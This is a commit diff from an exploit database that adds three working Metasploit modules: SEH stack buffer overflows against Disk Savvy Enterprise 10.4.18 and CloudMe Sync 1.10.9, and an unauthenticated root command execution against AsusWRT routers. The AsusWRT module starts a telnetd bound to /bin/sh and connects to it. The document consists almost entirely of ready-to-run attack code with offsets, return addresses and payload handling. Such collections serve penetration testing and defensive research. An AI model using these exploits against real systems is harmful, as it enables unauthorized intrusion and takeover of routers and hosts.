DB: 2018-02-27
3 changes to exploits/shellcodes Disk Savvy Enterprise 10.4.18 - Stack-Based Buffer Overflow (Metasploit) CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)
This commit is contained in:
parent
971db1056d
commit
d0ed4bb0d2
4 changed files with 279 additions and 0 deletions
132
exploits/hardware/remote/44176.rb
Executable file
132
exploits/hardware/remote/44176.rb
Executable file
|
@ -0,0 +1,132 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::Udp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution',
|
||||
'Description' => %q{
|
||||
The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to
|
||||
perform a POST in certain cases. This can be combined with another vulnerability in
|
||||
the VPN configuration upload routine that sets NVRAM configuration variables directly
|
||||
from the POST request to enable a special command mode.
|
||||
This command mode can then be abused by sending a UDP packet to infosvr, which is running
|
||||
on port UDP 9999 to directly execute commands as root.
|
||||
This exploit leverages that to start telnetd in a random port, and then connects to it.
|
||||
It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://blogs.securiteam.com/index.php/archives/3589'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'],
|
||||
['CVE', '2018-5999'],
|
||||
['CVE', '2018-6000']
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'AsusWRT < v3.0.0.4.384.10007',
|
||||
{
|
||||
'Payload' =>
|
||||
{
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd_interact',
|
||||
'ConnectionType' => 'find',
|
||||
},
|
||||
},
|
||||
}
|
||||
],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
'DisclosureDate' => 'Jan 22 2018',
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9999)
|
||||
])
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80])
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
# first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD
|
||||
# this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting!
|
||||
post_data = Rex::MIME::Message.new
|
||||
post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"ateCommand_flag\"")
|
||||
|
||||
data = post_data.to_s
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/vpnupload.cgi",
|
||||
'method' => 'POST',
|
||||
'rport' => datastore['ASUSWRTPORT'],
|
||||
'data' => data,
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
print_good("#{peer} - Successfully set the ateCommand_flag variable.")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Failed to set ateCommand_flag variable.")
|
||||
end
|
||||
|
||||
|
||||
# ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above.
|
||||
info_pdu_size = 512 # expected packet size, not sure what the extra bytes are
|
||||
r = Random.new
|
||||
|
||||
ibox_comm_pkt_hdr_ex =
|
||||
[0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC
|
||||
[0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15
|
||||
[0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33
|
||||
r.bytes(4) + # Info, don't know what this is
|
||||
r.bytes(6) + # MAC address
|
||||
r.bytes(32) # Password
|
||||
|
||||
telnet_port = rand((2**16)-1024)+1024
|
||||
cmd = "/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}" + [0x00].pack('C*')
|
||||
pkt_syscmd =
|
||||
[cmd.length,0x00].pack('C*') + # cmd length
|
||||
cmd # our command
|
||||
|
||||
pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length)
|
||||
|
||||
connect_udp
|
||||
udp_sock.put(pkt_final) # we could process the response, but we don't care
|
||||
disconnect_udp
|
||||
|
||||
print_status("#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}")
|
||||
sleep(10)
|
||||
|
||||
begin
|
||||
ctx = { 'Msf' => framework, 'MsfExploit' => self }
|
||||
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 })
|
||||
if not sock.nil?
|
||||
print_good("#{peer} - Success, shell incoming!")
|
||||
return handler(sock)
|
||||
end
|
||||
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||
sock.close if sock
|
||||
end
|
||||
|
||||
print_bad("#{peer} - Well that didn't work... try again?")
|
||||
end
|
||||
end
|
77
exploits/windows/remote/44174.rb
Executable file
77
exploits/windows/remote/44174.rb
Executable file
|
@ -0,0 +1,77 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Disk Savvy Enterprise v10.4.18',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow vulnerability
|
||||
in Disk Savvy Enterprise v10.4.18, caused by improper bounds
|
||||
checking of the request sent to the built-in server. This module
|
||||
has been tested successfully on Windows 7 SP1 x86.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Daniel Teixeira'
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00\x02\x0a\x0d\xf8",
|
||||
'Space' => 800
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Disk Savvy Enterprise v10.4.18',
|
||||
{
|
||||
'Offset' => 124,
|
||||
'Ret' => 0x10056d13
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Jan 31 2017',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([Opt::RPORT(9124)])
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
seh = generate_seh_record(target.ret)
|
||||
connect
|
||||
|
||||
buffer = make_nops(target['Offset'])
|
||||
buffer << seh
|
||||
buffer << "\x83\xc4\x7f" * 13 #ADD esp,7fh
|
||||
buffer << "\x83\xc4\x21" #ADD esp,21h
|
||||
buffer << "\xff\xe4" #JMP esp
|
||||
buffer << payload.encoded
|
||||
buffer << Rex::Text.rand_text_alphanumeric(1)
|
||||
|
||||
header = "\x75\x19\xba\xab"
|
||||
header << "\x03\x00\x00\x00"
|
||||
header << "\x00\x40\x00\x00"
|
||||
header << [buffer.length].pack("V")
|
||||
header << [buffer.length].pack("V")
|
||||
header << [buffer[-1].ord].pack("V")
|
||||
packet = header
|
||||
packet << buffer
|
||||
|
||||
sock.put(packet)
|
||||
handler
|
||||
end
|
||||
end
|
67
exploits/windows/remote/44175.rb
Executable file
67
exploits/windows/remote/44175.rb
Executable file
|
@ -0,0 +1,67 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CloudMe Sync v1.10.9',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow vulnerability
|
||||
in CloudMe Sync v1.10.9 client application. This module has been
|
||||
tested successfully on Windows 7 SP1 x86.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'hyp3rlinx', # Original exploit author
|
||||
'Daniel Teixeira' # MSF module author
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2018-6892'],
|
||||
[ 'EDB', '44027' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'CloudMe Sync v1.10.9',
|
||||
{
|
||||
'Offset' => 2232,
|
||||
'Ret' => 0x61e7b7f6
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Jan 17 2018',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([Opt::RPORT(8888)])
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
buffer = make_nops(target['Offset'])
|
||||
buffer << generate_seh_record(target.ret)
|
||||
buffer << payload.encoded
|
||||
|
||||
sock.put(buffer)
|
||||
handler
|
||||
end
|
||||
end
|
|
@ -16252,6 +16252,9 @@ id,file,description,date,author,type,platform,port
|
|||
44155,exploits/windows/remote/44155.py,"EChat Server 3.1 - 'CHAT.ghp' Buffer Overflow",2018-02-21,"Juan Sacco",remote,windows,
|
||||
44156,exploits/windows/remote/44156.py,"Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH)",2018-02-21,"Daniel Teixeira",remote,windows,
|
||||
44157,exploits/windows/remote/44157.py,"Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)",2018-02-21,"Daniel Teixeira",remote,windows,
|
||||
44174,exploits/windows/remote/44174.rb,"Disk Savvy Enterprise 10.4.18 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,9124
|
||||
44175,exploits/windows/remote/44175.rb,"CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,8888
|
||||
44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue